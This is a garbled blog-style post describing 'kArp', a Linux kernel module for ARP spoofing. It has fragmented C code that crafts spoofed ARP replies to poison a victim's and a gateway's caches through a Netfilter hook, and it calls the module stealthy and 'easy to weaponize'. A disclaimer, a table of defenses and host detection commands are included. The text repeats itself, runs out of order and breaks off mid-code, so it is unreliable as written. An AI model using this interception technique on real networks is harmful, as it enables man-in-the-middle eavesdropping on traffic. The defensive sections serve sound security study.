The code for kArp is intentionally small (~450 LOC) – easy to audit, easy to weaponize. I’ll release it on GitHub under an educational license in the coming weeks. ARP spoofing is a 40-year-old attack, but it refuses to die. Until IPv6 with Secure Neighbor Discovery (SEND) is universal, and until every switch runs DAI, kernel-level ARP tricks will remain in every serious attacker’s toolkit.
If you’ve ever used arpspoof (from dsniff) or bettercap , you know they work well—but they operate in . This means packet injection involves context switches, libpcap overhead, and occasional race conditions.
Disclaimer: This post is for educational purposes and authorized security testing only. ARP spoofing is illegal without explicit permission from the network owner. Do not run this on networks you do not own or lack written authorization for. kArp Linux Kernel Level ARP Hijacking Spoofing Utility
The module creates no /proc or /sys entry – detection requires lsmod | grep karp or brute-force Netfilter hook enumeration. Because kArp operates at LKM level, traditional arpwatch or dynamic ARP inspection (DAI) on switches still work – but you cannot kill it with pkill arpspoof . What Defends Against kArp? | Defense | Effective? | Notes | |---------|------------|-------| | Static ARP tables | ✅ Yes | Prevents any ARP cache poisoning | | arp_filter / arp_ignore sysctls | ✅ Partially | Hardens Linux hosts | | DAI on managed switches | ✅ Yes | Switch drops invalid ARP | | 802.1X + port security | ✅ Yes | Prevents module load on endpoint | | LSM (SELinux) blocking insmod | ✅ Yes | Kernel module loading restricted | Detecting kArp on a Host # List all Netfilter hooks (requires root) cat /proc/net/netfilter/nf_hooks | grep -B2 karp Check for unknown kernel modules lsmod | grep -v "^Module|^usb|^video"
// Mirror for gateway -> victim direction if (ip->daddr == gateway_ip) build_arp_reply(victim_ip, attacker_mac, gateway_ip, &spoof_arp); dev_queue_xmit(...); The code for kArp is intentionally small (~450
static unsigned int karphook_post(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
return NF_ACCEPT;
// Check if destination IP is our victim if (ip->daddr == victim_ip) // Craft ARP reply: "Gateway IP is at attacker's MAC" build_arp_reply(gateway_ip, attacker_mac, victim_ip, &spoof_arp); dev_queue_xmit(alloc_skb_from_arp(&spoof_arp, dev)); printk(KERN_INFO "kArp: Poisoned %pI4 -> Gateway at %pM\n", &victim_ip, attacker_mac);